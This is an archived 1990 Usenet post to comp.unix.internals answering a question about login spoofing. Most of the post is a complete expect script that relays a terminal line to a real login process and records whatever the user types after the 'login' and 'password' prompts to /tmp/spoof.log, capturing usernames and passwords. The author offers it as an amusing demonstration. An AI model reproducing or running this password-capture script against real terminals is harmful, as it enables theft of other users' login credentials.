Finding Passwords
Don Libes
libes at cme.nist.gov
Tue Oct 9 10:16:28 AEST 1990
In article <162 at cutmcvax.OZ> wemmp at cutmcvax.oz.au (Peter Wemm) writes:
> What if the spoofer opens a tty/pty that just transfers characters
> between master/slave and the process catches all data passing through
> containing the lines 'login:' or 'password'. I think it can. That
> way it could run a fake getty/REAL login or perhaps even both of the
> real programs!! It would be indetectable except that if the user typed
> 'tty' they would be on ttyp? instead of the normal line. Again, this
> requires physical access to the terminal or line. Just a thought.......
Here's a short expect script to do exactly this. Just thought you'd
be amused.
It connects the input and output of 'login' to a tty. Whenever it
sees the strings "password" or "login" come from the login process, it
begins recording everything up to the next output from the login process.
set log /tmp/spoof.log
spawn tip /dev/ttya ;# open a connection to tty to be spoofed
set tty $spawn_id
expect *connected* ;# throw away tip's "connected" msg
spawn login ;# open a connection to a login process
set login $spawn_id
for {} 1 {} {
set ready [select $tty $login]
for {set i 0} {$i < [length $ready]} {set i [expr $i+1]} {
set spawn_id [index $ready $i]
if {$spawn_id == $login} {
expect {*password* *login*} {log_file $log} \
eof {close $tty; exit} \
* {log_file}
set spawn_id $tty
}
if {$spawn_id == $tty} {
expect eof {close $login; exit} \
*
set spawn_id $login
}
send $expect_match
}
}
More information about the Comp.unix.internals
mailing list